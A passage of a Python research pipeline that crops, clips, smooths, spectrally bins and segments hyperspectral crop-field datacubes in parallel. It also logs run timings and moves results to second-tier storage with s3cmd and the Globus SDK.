recurs_dir(new_dir, search_ext) if out_files_temp: # if list is not empty out_files.extend(out_files_temp) # add items return sorted(out_files) def retrieve_files(data_dir, panel_type, crop_type): ''' Gets all the necessary files to be used in this scenario. Returns: df_crop (``pandas.DataFrame``): a dataframe containing all the cropping instructions for all the input datacubes ''' fname_crop_info = os.path.join(data_dir, crop_type + '.csv') df_crop = pd.read_csv(fname_crop_info) df_crop['date'] = pd.to_datetime(df_crop['date']) df_crop['directory'] = df_crop.apply(lambda row : os.path.join( row['directory'], panel_type), axis = 1) gdf_wells_fname = os.path.join(data_dir, 'plot_bounds_wells.geojson') gdf_aerf_fname = os.path.join(data_dir, 'aerf_whole_field_sample_locs.geojson') gdf_wells = gpd.read_file(gdf_wells_fname) gdf_aerf = gpd.read_file(gdf_aerf_fname) return df_crop, gdf_wells, gdf_aerf def convert_size(size_bytes): if size_bytes == 0: return "0B" size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB") i = int(math.floor(math.log(size_bytes, 1024))) p = math.pow(1024, i) s = round(size_bytes / p, 2) return "%s %s" % (s, size_name[i]) def unique_datacubes(df_crop): ''' Returns a list of unique datacubes from df_crop ''' fname_list = [] for idx, row in df_crop.iterrows(): fname = os.path.join(row['directory'], row['name_short'] + row['name_long'] + row['ext']) if fname not in fname_list: fname_list.append(fname) df_files = pd.DataFrame(columns=['filename', 'size']) for fname in fname_list: if os.path.isfile(fname): data = [fname, os.path.getsize(fname)] df_temp = pd.DataFrame(data=[data], columns=df_files.columns) df_files = df_files.append(df_temp) print('Total number of datacubes to crop: {0}'.format(len(df_files))) print('Total file size: {0}\n'.format(convert_size(df_files['size'].sum()))) def check_processing(dir_out, ext='.bip', n_files=833): ''' Checks directory; if it doesn't exist, it is created; if processing is finished, True is returned to indicate this step can be skipped. ''' if not os.path.isdir(dir_out): pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) # try: # os.mkdir(dir_out) # except FileNotFoundError: # os.mkdir(os.path.split(dir_out)[0]) # os.mkdir(dir_out) skip = False elif len(fnmatch.filter(os.listdir(dir_out), '*' + ext)) >= n_files: skip = True # directory exists and contains many files; clipping was already done else: skip = False # directory exists, but clipping was not completed return skip def get_msi_segment_dir(row, level='segment'): ''' Gets the msi directory equivalent of the directory where the .spec and other files are located following segmentation. These will be transfered to 2nd tier storage after testing/plotting. Parameters: row (``pd.Series``): ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, _, _, _, _, _, _ = get_segment_type(row) if level == 'segment': msi_seg_dir = '/'.join((panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type)) elif level == 'bin': msi_seg_dir = '/'.join((panel_type, crop_type, clip_type, smooth_type, bin_type)) elif level == 'smooth': msi_seg_dir = '/'.join((panel_type, crop_type, clip_type, smooth_type)) elif level == 'clip': msi_seg_dir = '/'.join((panel_type, crop_type, clip_type)) elif level == 'crop': msi_seg_dir = '/'.join((panel_type, crop_type)) return msi_seg_dir def tier2_data_transfer(dir_base, row): ''' Actually transfers the data to MSI 2nd tier storage I think this may take quite some time, so should always be used in a parallelized way Parameters: row (``pd.Series``): ''' # msi_dir = 'results/ref_closest_panel/crop_plot/clip_none/smooth_none/seg_mcari2_50_upper' msi_seg_dir = get_msi_segment_dir(row) tier2_dir = os.path.join('S3://', msi_seg_dir) subprocess.call(['s3cmd', 'put', '-r', dir_base + mis_seg_dir2, tier2_dir]) subprocess.call(['rm', '-r', dir_base + mis_seg_dir2]) def tier2_results_transfer(msi_result_dir, globus_client_id='684eb60a-9c5e-48af-929d-0880fd829173'): ''' Transfers results from msi_0_000 folder from high performance storage to 2nd tier storage ''' tier2_dir = os.path.join('S3://results', msi_result_dir) subprocess.call(['s3cmd', 'put', '-r', dir_base + msi_result_dir, tier2_dir]) subprocess.call(['rm', '-r', dir_base + msi_result_dir]) def get_globus_data_dir(dir_base, msi_run_id, row, msi_base='/home/yangc1/public', level='segment'): ''' Gets the data directory to transfer all files Parameters: level (``str``): The data directory level to transfer; must be one of ['segment', 'bin', 'smooth', 'clip', 'crop']. ''' msi_seg_dir = get_msi_segment_dir(row, level=level) dest_base_dir = os.path.basename(dir_base) + '_msi_run_' + str(msi_run_id) dir_source_data = '/'.join( (msi_base, os.path.basename(dir_base), 'data', msi_seg_dir + '/')) dir_dest_data = '/'.join( ('/' + dest_base_dir, 'data', msi_seg_dir + '/')) return dir_source_data, dir_dest_data def get_globus_results_dir(dir_base, msi_run_id, row, msi_base='/home/yangc1/public'): label_base = 'msi_' + str(msi_run_id) + '_' + str(row.name).zfill(3) dest_base_dir = os.path.basename(dir_base) + '_msi_run_' + str(msi_run_id) dir_source_results = '/'.join( (msi_base, os.path.basename(dir_base), 'results', 'msi_' + str(msi_run_id) + '_results', label_base + '/')) dir_dest_results = '/'.join( ('/' + dest_base_dir, 'results', 'msi_' + str(msi_run_id) + '_results', label_base + '/')) return dir_source_results, dir_dest_results def globus_autoactivate(tc, endpoint, if_expires_in=7200): r = tc.endpoint_autoactivate(endpoint, if_expires_in=if_expires_in) if (r["code"] == "AutoActivationFailed"): print("Endpoint requires manual activation, please open " "the following URL in a browser to activate the " "endpoint:") print("https://app.globus.org/file-manager?origin_id=%s" % endpoint) def globus_transfer(dir_source_data, dir_dest_data, TRANSFER_REFRESH_TOKEN, client, TRANSFER_TOKEN, delete_only=None, label=None, source_endpoint='d865fc6a-2db3-11e6-8070-22000b1701d1', dest_endpoint='fb6f1c6b-86b1-11e8-9571-0a6d4e044368'): ''' Transfers results from msi_0_000 folder from high performance storage to 2nd tier storage using the GLOBUS Python SDK API. This required some setup (see "globus_token.py") dir_source_data = '/home/yangc1/public/hs_process/results/msi_1_results/' dir_dest_data = 'hs_process/results/msi_1_results' ''' # if source_endpoint is None: # source_endpoint = tc.endpoint_search(filter_fulltext='umnmsi#home') # if dest_endpoint is None: # # dest_endpoint = tc.endpoint_search(filter_fulltext='umnmsi#tier2') # tier2_id = 'fb6f1c6b-86b1-11e8-9571-0a6d4e044368' # dest_endpoint = tc.get_endpoint(tier2_id) # First, get the transfer client using access tokens authorizer = globus_sdk.RefreshTokenAuthorizer( TRANSFER_REFRESH_TOKEN, client, access_token=TRANSFER_TOKEN) tc = globus_sdk.TransferClient(authorizer=authorizer) globus_autoactivate(tc, source_endpoint) globus_autoactivate(tc, dest_endpoint) submission_id = None # see: https://globus-sdk-python.readthedocs.io/en/stable/clients/transfer/#helper-objects tdata = globus_sdk.TransferData( # initialize data transfer tc, source_endpoint=source_endpoint, destination_endpoint=dest_endpoint, label=label, submission_id=submission_id, sync_level=2, verify_checksum=False, preserve_timestamp=False, encrypt_data=False, deadline=None, recursive_symlinks='ignore') tdata.add_item(dir_source_data, dir_dest_data, recursive=True) # add directory transfer_result, delete_result = None, None if delete_only == False or delete_only is None: # transfer transfer_result = tc.submit_transfer(tdata) print("GLOBUS TRANSFER task_id:", transfer_result["task_id"]) print('Waiting for transfer {0} to complete...' ''.format(transfer_result['task_id'])) c = it.count(1) while not tc.task_wait(transfer_result['task_id'], timeout=60): count = next(c) print('Transfer {0} has not yet finished; transfer submitted {1} ' 'minute(s) ago'.format(transfer_result['task_id'], count)) if count >= 6: print('Cancelling task after {0} minutes.'.format(count)) tc.cancel_task(transfer_result['task_id']) if count >= 8: print('Looks like I have to break out of the while loop.') break print('DONE.') if delete_only == False or delete_only == True: # delete ddata = globus_sdk.DeleteData(tc, source_endpoint, recursive=True) ddata.add_item(dir_source_data) delete_result = tc.submit_delete(ddata) print("GLOBUS DELETE task_id:", delete_result['task_id']) return transfer_result, delete_result def restart_script(): print("argv was", sys.argv) print("sys.executable was", sys.executable) print("restart now") # os.execv(sys.executable, ['python'] + sys.argv) os.execv(sys.executable, ['python', __file__] + sys.argv[1:]) def save_n_obs(dir_results_meta, df_join, msi_run_id, grid_idx, y_label, feat): fname = os.path.join(dir_results_meta, 'msi_{0}_n_observations.csv' ''.format(msi_run_id)) if not os.path.exists(fname): with open(fname, 'w+') as f: f.write('msi_run_id, grid_idx, y_label, feature, obs_n\n') with open(fname, 'a+') as f: f.write('{0}, {1}, {2}, {3}, {4}\n' ''.format(msi_run_id, grid_idx, y_label, feat, len(df_join))) # In[Timing functions] def time_setup_img(dir_out, msi_run_id): ''' Set up times dictionary and save to file for every loop to append a new row ''' cols = ['msi_run_id', 'grid_idx', 'n_jobs', 'time_start', 'time_end', 'time_total', 'crop', 'clip', 'smooth', 'bin', 'segment'] pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) fname_times = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_time_imgproc.csv') if not os.path.isfile(fname_times): df_times = pd.DataFrame(columns=cols) df_times.to_csv(fname_times, index=False) time_dict = {i:[None] for i in cols} return time_dict def time_setup_training(dir_out, msi_run_id): ''' Set up times dictionary and save to file for every loop to append a new row ''' cols = ['n_jobs', 'msi_run_id', 'grid_idx', 'y_label', 'feats', 'time_start', 'time_end', 'time_total', # 'init1', 'init2', 'init3', 'load_ground', 'load_spec', 'join_data', 'feat_sel', 'tune', 'test', 'plot'] pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) fname_times = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_time_train.csv') if not os.path.isfile(fname_times): df_times = pd.DataFrame(columns=cols) df_times.to_csv(fname_times, index=False) time_dict = {i:[None] for i in cols} return time_dict # def time_setup_training(dir_out, y_label_list, extra_feats_names, msi_run_id): # ''' # Set up times dictionary and save to file for every loop to append a new # row # ''' # cols = ['n_jobs', 'msi_run_id', 'grid_idx', # 'time_start', 'time_end', 'time_total', 'sttp-init'] # for y_label in y_label_list: # for feat_name in extra_feats_names: # col_str = 'sttp-' + y_label + '-' + feat_name # cols.append(col_str) # if not os.path.isdir(dir_out): # os.mkdir(dir_out) # fname_times = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_train_runtime.csv') # if not os.path.isfile(fname_times): # df_times = pd.DataFrame(columns=cols) # df_times.to_csv(fname_times, index=False) # time_dict = {i:[None] for i in cols} # return time_dict def append_times(dir_out, time_dict, msi_run_id): ''' Appends time info to the 'runtime.csv' in ``dir_out`` Parameters: time_dict (``dict``): contains the time delta or datetime string to be written to each .csv column ''' time_end = datetime.now() time_dict['time_end'] = [str(time_end)] time_start = datetime.strptime( time_dict['time_start'][0], '%Y-%m-%d %H:%M:%S.%f') time_total = time_end - time_start time_dict['time_total'] = [str(time_total)] if 'segment' in time_dict.keys(): fname = 'msi_' + str(msi_run_id) + '_time_imgproc.csv' else: fname = 'msi_' + str(msi_run_id) + '_time_train.csv' fname_times = os.path.join(dir_out, fname) df_time = pd.DataFrame.from_dict(time_dict) df_time.to_csv(fname_times, header=None, mode='a', index=False, index_label=df_time.columns) time_dict_null = dict.fromkeys(time_dict.keys(), [None]) return time_dict_null def time_loop_init(time_dict, msi_run_id, grid_idx, n_jobs): ''' Initialization function for keeping track of time. Returns ``time_dict``, which will hold the time delta or datetime string for each step in the script. ''' time_start = datetime.now() time_dict['n_jobs'] = [n_jobs] time_dict['msi_run_id'] = [msi_run_id] time_dict['grid_idx'] = [grid_idx] time_dict['time_start'] = [str(time_start)] return time_dict, time_start def time_step(time_dict, key, time_last): ''' Calculates the time since time_last and adds it to ``time_dict`` for the appropriate key. ''' time_new = datetime.now() time_dif = time_new - time_last time_dict[key] = [str(time_dif)] return time_dict, time_new # In[Count processed image functions] def proc_files_count_setup(dir_out, msi_run_id): ''' Set up processed files dict and save to file for every loop to append a new row ''' cols = ['n_jobs', 'msi_run_id', 'grid_idx', 'processed'] pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) fname_n_files = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_imgproc_n_files.csv') if not os.path.isfile(fname_n_files): df_proc = pd.DataFrame(columns=cols) df_proc.to_csv(fname_n_files, index=False) proc_dict = {i:[None] for i in cols} return proc_dict def proc_files_count(proc_dict, n_jobs, msi_run_id, key, dir_data, row, ext='.spec'): ''' Calculates the time since time_last and adds it to ``time_dict`` for the appropriate key. ''' proc_dict['n_jobs'] = [n_jobs] proc_dict['msi_run_id'] = [msi_run_id] # dir_data has to be explicit if we're going to do this for every single level.. # n_files_proc = len(recurs_dir(get_spec_data(dir_data, row, feat='reflectance'), search_ext=ext)) n_files_proc = len(fnmatch.filter(os.listdir( get_spec_data(dir_data, row, feat='reflectance')), '*' + ext)) proc_dict[key] = [n_files_proc] return proc_dict, n_files_proc def proc_files_append(dir_out, proc_dict, msi_run_id): ''' Appends time info to the '_imgproc_n_files.csv' in ``dir_out`` Parameters: proc_dict (``dict``): contains the n processed files to be written to each .csv column ''' fname = 'msi_' + str(msi_run_id) + '_imgproc_n_files.csv' fname_n_files = os.path.join(dir_out, fname) df_proc = pd.DataFrame.from_dict(proc_dict) df_proc.to_csv(fname_n_files, header=None, mode='a', index=False, index_label=df_proc.columns) proc_dict_null = dict.fromkeys(proc_dict.keys(), [None]) return proc_dict_null # In[Image processing functions] def print_details(row): print('\nProcessing scenario ID: {0}'.format(row.name)) print('Panels type: {0}'.format(row['dir_panels'])) print('Crop type: {0}'.format(row['crop'])) print('Clip type: {0}'.format(row['clip'])) print('Smooth type: {0}'.format(row['smooth'])) print('Bin type: {0}'.format(row['bin'])) print('Segment type: {0}'.format(row['segment'])) def get_clip_type(row): ''' Determines the clip type being used in this scenario (and updates wl_bands accordingly) Parameters: row (``pd.Series``): ''' if pd.isnull(row['clip']): clip_type = 'clip_none' wl_bands = row['clip'] elif len(row['clip']['wl_bands']) == 2: clip_type = 'clip_ends' wl_bands = row['clip']['wl_bands'] elif len(row['clip']['wl_bands']) == 4: clip_type = 'clip_all' wl_bands = row['clip']['wl_bands'] return clip_type, wl_bands def get_smooth_type(row): ''' Determines the smooth type being used in this scenario and returns window size and order for use in file names, etc. ''' if pd.isnull(row['smooth']): smooth_type = 'smooth_none' window_size = row['smooth'] order = row['smooth'] else: window_size = row['smooth']['window_size'] order = row['smooth']['order'] smooth_type = 'smooth_window_{0}'.format(window_size) return smooth_type, window_size, order def get_bin_type(row): ''' Determines the bin type being used in this scenario (and updates accordingly) Parameters: row (``pd.Series``): ''' if pd.isnull(row['bin']): method_bin = None else: method_bin = row['bin']['method'] if method_bin == 'spectral_mimic': sensor = row['bin']['sensor'] bandwidth = None bin_type = 'bin_mimic_{0}'.format(sensor.replace('-', '_')) elif method_bin == 'spectral_resample': sensor = None bandwidth = row['bin']['bandwidth'] bin_type = 'bin_resample_{0}nm'.format(bandwidth) else: sensor = None bandwidth = None bin_type = 'bin_none' return bin_type, method_bin, sensor, bandwidth def get_segment_type(row): ''' Determines the segment type being used in this scenario and returns other relevant information for use in file names, etc. ''' if pd.isnull(row['segment']): method = None wl1 = None wl2 = None wl3 = None mask_percentile = None mask_side = None segment_type = 'seg_none' elif row['segment']['method'] == 'mcari2': method = row['segment']['method'] wl1 = row['segment']['wl1'] wl2 = row['segment']['wl2'] wl3 = row['segment']['wl3'] mask_percentile = row['segment']['mask_percentile'] mask_side = row['segment']['mask_side'] if isinstance(mask_percentile, list): mask_pctl_print = '_'.join([str(x) for x in mask_percentile]) segment_type = 'seg_{0}_{1}_{2}'.format(method, mask_pctl_print, get_side_inverse(mask_side)) else: segment_type = 'seg_{0}_{1}_{2}'.format(method, mask_percentile, get_side_inverse(mask_side)) elif row['segment']['method'] == 'ndi': method = row['segment']['method'] wl1 = row['segment']['wl1'] wl2 = row['segment']['wl2'] wl3 = None mask_percentile = row['segment']['mask_percentile'] mask_side = row['segment']['mask_side'] if isinstance(mask_percentile, list): mask_pctl_print = '_'.join([str(x) for x in mask_percentile]) segment_type = 'seg_{0}_{1}_{2}'.format(method, mask_pctl_print, get_side_inverse(mask_side)) else: segment_type = 'seg_{0}_{1}_{2}'.format(method, mask_percentile, get_side_inverse(mask_side)) elif row['segment']['method'] == ['mcari2', 'mcari2']: method = row['segment']['method'] wl1 = row['segment']['wl1'] wl2 = row['segment']['wl2'] wl3 = row['segment']['wl3'] mask_percentile = row['segment']['mask_percentile'] mask_side = row['segment']['mask_side'] segment_type = 'seg_{0}_between_{1}_{2}_pctl'.format(method[0], mask_percentile[0], mask_percentile[1]) elif isinstance(row['segment']['method'], list) and row['segment']['method'][1] != 'mcari2': method = row['segment']['method'] wl1 = row['segment']['wl1'] wl2 = row['segment']['wl2'] wl3 = row['segment']['wl3'] mask_percentile = row['segment']['mask_percentile'] mask_side = row['segment']['mask_side'] if method == ['mcari2', [545, 565]]: segment_type = 'seg_mcari2_{0}_{1}_green_{2}_{3}'.format(mask_percentile[0], get_side_inverse(mask_side[0]), mask_percentile[1], get_side_inverse(mask_side[1])) elif method == ['mcari2', [800, 820]]: segment_type = 'seg_mcari2_{0}_{1}_nir_{2}_{3}'.format(mask_percentile[0], get_side_inverse(mask_side[0]), mask_percentile[1], get_side_inverse(mask_side[1])) return segment_type, method, wl1, wl2, wl3, mask_percentile, mask_side def smooth_get_base_dir(dir_data, panel_type, crop_type, clip_type): ''' Gets the base directory for the smoothed images ''' if clip_type == 'clip_none': base_dir = os.path.join(dir_data, panel_type, crop_type) else: base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type) return base_dir def bin_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type): ''' Gets the base directory for the binned images ''' if smooth_type == 'smooth_none' and clip_type == 'clip_none': base_dir = os.path.join(dir_data, panel_type, crop_type) elif smooth_type == 'smooth_none' and clip_type != 'clip_none': base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type) else: # smooth_type != 'smooth_none' base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type) return base_dir def seg_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type): ''' Gets the base directory for the segmented images ''' if bin_type == 'bin_none' and smooth_type == 'smooth_none' and clip_type == 'clip_none': base_dir = os.path.join(dir_data, panel_type, crop_type) elif bin_type == 'bin_none' and smooth_type == 'smooth_none' and clip_type != 'clip_none': base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type) elif bin_type == 'bin_none' and smooth_type != 'smooth_none': base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type) else: # bin_type != 'bin_none' base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) return base_dir def crop(df_crop, panel_type, dir_out_crop, out_force=True, n_files=854, gdf_aerf=None, gdf_wells=None): ''' Gets the cropping info for each site and crops all the datacubes Parameters: df_crop (``pandas.DataFrame``): a dataframe containing all the cropping instructions for all the input datacubes ''' if check_processing(dir_out_crop, ext='.bip', n_files=n_files): return folder_name = None name_append = os.path.split(dir_out_crop)[-1].replace('_', '-') if panel_type == 'ref_closest_panel': # data doesn't exist for 7/23 aerf small plot df_crop_aerf_small = df_crop[(df_crop['study'] == 'aerfsmall') & (df_crop['date'] != datetime(2019, 7, 23))] else: df_crop_aerf_small = df_crop[df_crop['study'] == 'aerfsmall'] df_crop_aerf_whole = df_crop[df_crop['study'] == 'aerffield'] df_crop_wells_18 = df_crop[(df_crop['study'] == 'wells') & (df_crop['date'].dt.year == 2018)] df_crop_wells_19 = df_crop[(df_crop['study'] == 'wells') & (df_crop['date'].dt.year == 2019)] hsbatch = batch() hsbatch.io.set_io_defaults(force=out_force) hsbatch.spatial_crop(fname_sheet=df_crop_wells_18, method='many_gdf', gdf=gdf_wells, base_dir_out=dir_out_crop, folder_name=folder_name, name_append=name_append) hsbatch.spatial_crop(fname_sheet=df_crop_wells_19, method='many_gdf', gdf=gdf_wells, base_dir_out=dir_out_crop, folder_name=folder_name, name_append=name_append) hsbatch.spatial_crop(fname_sheet=df_crop_aerf_small, method='single', base_dir_out=dir_out_crop, folder_name=folder_name, name_append=name_append) hsbatch.spatial_crop(fname_sheet=df_crop_aerf_whole, method='many_gdf', gdf=gdf_aerf, base_dir_out=dir_out_crop, folder_name=folder_name, name_append=name_append) def chunk_by_n(array, n): np.random.shuffle(array) # studies have different size images, so shuffling makes each chunk more similar arrays = np.array_split(array, n) list_out = [] for l in arrays: list_out.append(l.tolist()) return list_out def check_missed_files(fname_list, base_dir_out, ext_out, f_pp, row, base_dir_f, out_force, lock): ''' Check if any files were not processed that were supposed to be processed. Parameters: f_pp (function): The parallel processing function to run to complete the processing of the missing files. **kwargs (dict): keyword arguments to pass to f_pp. ''' # Goal: take out filepaths and end text to_process = [os.path.splitext(os.path.basename(i))[0].rsplit('-')[0] for i in fname_list] name_ex, ext = os.path.splitext(fname_list[0]) end_str = '-' + '-'.join(name_ex.split('-')[1:]) + ext # Find processed files without filepaths and end text # base_dir_spec = os.path.join(dir_out_mask, 'reflectance') fname_list_complete = fnmatch.filter(os.listdir(base_dir_out), '*' + ext_out) # no filepath processed = [os.path.splitext(i)[0].split('-')[0] for i in fname_list_complete] missed = [f for f in to_process if f not in processed] base_dir = os.path.dirname(fname_list[0]) fname_list_missed = [os.path.join(base_dir, f + end_str) for f in missed] if len(missed) > 0: print('There were {0} images that slipped through the cracks. ' 'Processing them manually now...\n'.format(len(missed))) print('Directory: {0}'.format(base_dir)) print('Here are the missed images:\n{0}\n'.format(missed)) f_pp(fname_list_missed, row, base_dir_f, out_force, lock) def clip(dir_data, row, out_force=True, n_files=854): ''' Clips each of the datacubes according to instructions in df_grid ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) base_dir = os.path.join(dir_data, panel_type, crop_type) dir_out_clip = os.path.join(dir_data, panel_type, crop_type, clip_type) if check_processing(dir_out_clip, ext='.bip', n_files=n_files): return if wl_bands is not None: folder_name = None name_append = os.path.split(dir_out_clip)[-1].replace('_', '-') hsbatch = batch() hsbatch.io.set_io_defaults(force=out_force) hsbatch.spectral_clip(base_dir=base_dir, folder_name=folder_name, name_append=name_append, base_dir_out=dir_out_clip, wl_bands=wl_bands) else: print('Clip: ``clip_type`` is None, so there is nothing to process.') def clip_f_pp(fname_list_clip, wl_bands, dir_out_clip, out_force, lock): ''' Parallel processing: clips each of the datacubes according to instructions in df_grid organized for multi-core processing. These are the lines of code that have to be passed as a function to ProcessPoolExecutor() ''' assert wl_bands is not None, ('``wl_bands`` must not be ``None``') hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) # clip2(fname_list_clip, wl_bands, dir_out_clip, hsbatch) # if wl_bands is not None: folder_name = None name_append = os.path.split(dir_out_clip)[-1].replace('_', '-') hsbatch.spectral_clip(fname_list=fname_list_clip, folder_name=folder_name, name_append=name_append, base_dir_out=dir_out_clip, wl_bands=wl_bands) def clip_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of band clipping via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) base_dir = os.path.join(dir_data, panel_type, crop_type) dir_out_clip = os.path.join(dir_data, panel_type, crop_type, clip_type) already_processed = check_processing(dir_out_clip, ext='.bip', n_files=n_files) if out_force is False and already_processed is True: fname_list = [] elif clip_type == 'clip_none': fname_list = [] else: fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip') # no filepath fname_list = [os.path.join(base_dir, f) for f in fname_list] # fname_list = recurs_dir(base_dir, search_ext='.bip', level=0) chunk_size = int(len(fname_list) / (n_jobs*2)) if len(fname_list) == 0: print('Clip: ``clip_type`` is either None and there is nothing to ' 'process, or all the images are already processed.') else: chunks = chunk_by_n(fname_list, n_jobs*2) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( clip_f_pp, chunks, it.repeat(wl_bands), it.repeat(dir_out_clip), it.repeat(out_force), it.repeat(lock)) ext_out = '.bip' check_missed_files(fname_list, dir_out_clip, ext_out, clip_f_pp, row, dir_out_clip, out_force, lock) def smooth(dir_data, row, out_force=True, n_files=854): ''' Smoothes each of the datacubes according to instructions in df_grid ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) smooth_type, window_size, order = get_smooth_type(row) base_dir = smooth_get_base_dir(dir_data, panel_type, crop_type, clip_type) dir_out_smooth = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type) if check_processing(dir_out_smooth, ext='.bip', n_files=n_files): return if window_size is not None and order is not None: folder_name = None name_append = os.path.split(dir_out_smooth)[-1].replace('_', '-') hsbatch = batch() hsbatch.io.set_io_defaults(force=out_force) hsbatch.spectral_smooth(base_dir=base_dir, folder_name=folder_name, name_append=name_append, base_dir_out=dir_out_smooth, window_size=window_size, order=order) else: print('Smooth: ``smooth_type`` is None, so there is nothing to process.') def smooth_f_pp(fname_list_smooth, window_size, order, dir_out_smooth, out_force, lock): ''' Parallel processing: smoothes each of the datacubes according to instructions in df_grid organized for multi-core processing. ''' msg = ('``window_size`` must not be ``None``') assert window_size is not None and order is not None, msg hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) # clip2(fname_list_clip, wl_bands, dir_out_clip, hsbatch) # if wl_bands is not None: folder_name = None name_append = os.path.split(dir_out_smooth)[-1].replace('_', '-') hsbatch.spectral_smooth( fname_list=fname_list_smooth, folder_name=folder_name, name_append=name_append, base_dir_out=dir_out_smooth, window_size=window_size, order=order) def smooth_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of band smoothing via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) smooth_type, window_size, order = get_smooth_type(row) base_dir = smooth_get_base_dir(dir_data, panel_type, crop_type, clip_type) dir_out_smooth = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type) already_processed = check_processing(dir_out_smooth, ext='.bip', n_files=n_files) if out_force is False and already_processed is True: fname_list = [] elif smooth_type == 'smooth_none': fname_list = [] else: fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip') # no filepath fname_list = [os.path.join(base_dir, f) for f in fname_list] # fname_list = recurs_dir(base_dir, search_ext='.bip', level=0) if len(fname_list) == 0: print('Smooth: ``smooth_type`` is either None and there is nothing to ' 'process, or all the images are already processed.') else: np.random.shuffle(fname_list) # studies have different size images, so shuffling makes each chunk more similar chunks = chunk_by_n(fname_list, n_jobs*2) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( smooth_f_pp, chunks, it.repeat(window_size), it.repeat(order), it.repeat(dir_out_smooth), it.repeat(out_force), it.repeat(lock)) ext = '.bip' check_missed_files(fname_list, dir_out_smooth, ext, smooth_f_pp, row, dir_out_smooth, out_force, lock) def bin_f_pp(fname_list_bin, row, dir_out_bin, out_force, lock): ''' Parallel processing: spectral mimic/resampling for each of the datacubes according to instructions in df_grid organized for multi-core processing. ''' bin_type, method_bin, sensor, bandwidth = get_bin_type(row) msg = ('``bin_type`` must not be ``None``') assert bin_type is not None, msg hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) folder_name = None name_append = os.path.split(dir_out_bin)[-1].replace('_', '-') if method_bin == 'spectral_resample': hsbatch.spectral_resample( fname_list=fname_list_bin, folder_name=folder_name, name_append=name_append, base_dir_out=dir_out_bin, bandwidth=bandwidth) elif method_bin == 'spectral_mimic': hsbatch.spectral_mimic( fname_list=fname_list_bin, folder_name=folder_name, name_append=name_append, base_dir_out=dir_out_bin, sensor=sensor) else: print('Bin: method "{0}" is not supported.'.format(method_bin)) def bin_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of spectral resampling/mimicking via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) smooth_type, window_size, order = get_smooth_type(row) bin_type, method_bin, sensor, bandwidth = get_bin_type(row) base_dir = bin_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type) dir_out_bin = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) already_processed = check_processing(dir_out_bin, ext='.bip', n_files=n_files) if out_force is False and already_processed is True: fname_list = [] elif bin_type == 'bin_none': fname_list = [] else: fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip') # no filepath fname_list = [os.path.join(base_dir, f) for f in fname_list] # fname_list = recurs_dir(base_dir, search_ext='.bip', level=0) if len(fname_list) == 0: print('Bin: ``bin_type`` is either None and there is nothing to ' 'process, or all the images are already processed.') else: chunks = chunk_by_n(fname_list, n_jobs*2) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( bin_f_pp, chunks, it.repeat(row), it.repeat(dir_out_bin), it.repeat(out_force), it.repeat(lock)) ext = '.bip' check_missed_files(fname_list, dir_out_bin, ext, bin_f_pp, row, dir_out_bin, out_force, lock) # # Goal: take out filepaths and end text # to_process = [os.path.splitext(os.path.basename(i))[0].rsplit('-')[0] for i in fname_list] # name_ex, ext = os.path.splitext(fname_list[0]) # end_str = '-' + '-'.join(name_ex.split('-')[1:]) + ext # # Find processed files without filepaths and end text # base_dir_seg = os.path.join(base_dir_bm, segment_type) # fname_list_complete = fnmatch.filter(os.listdir(base_dir_seg), '*' + '.spec') # no filepath # processed = [os.path.splitext(i)[0].rsplit('-')[0] for i in fname_list_complete] # missed = [f for f in to_process if f not in processed] # # base_dir = os.path.dirname(fname_list[0]) # fname_list_missed = [os.path.join(base_dir, f + end_str) for f in missed] # if len(missed) > 0: # print('There were {0} images that slipped through the cracks. ' # 'Processing them manually now...\n'.format(len(missed))) # print('Here are the missed images:\n{0}\n'.format(missed)) # bin_f_pp(fname_list_missed, row, dir_out_bin, out_force, lock) def parse_wls(wl, idx=0): ''' Require that wl is a list; if a range of wls is desired, the min and max should be in the list. If there are two items in a list, and both are also lists, then it's 